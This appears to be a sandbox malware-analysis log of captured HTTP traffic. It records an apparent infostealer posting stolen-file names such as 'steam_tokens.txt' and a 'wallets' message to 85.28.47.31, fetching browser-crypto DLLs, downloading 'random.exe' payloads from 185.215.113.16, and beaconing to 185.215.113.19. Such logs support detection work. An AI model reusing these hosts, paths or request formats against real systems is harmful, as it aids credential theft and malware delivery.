Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file"------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="file"------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"wallets------IECBAFCAAKJDHJKFIEBG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFBHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="message"ybncbhylepme------ECGHCBGCBFHIIDHIJKFB--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file"------GDGIJECGDGCBKECAKFBG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file"------GDGIJECGDGCBKECAKFBG--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
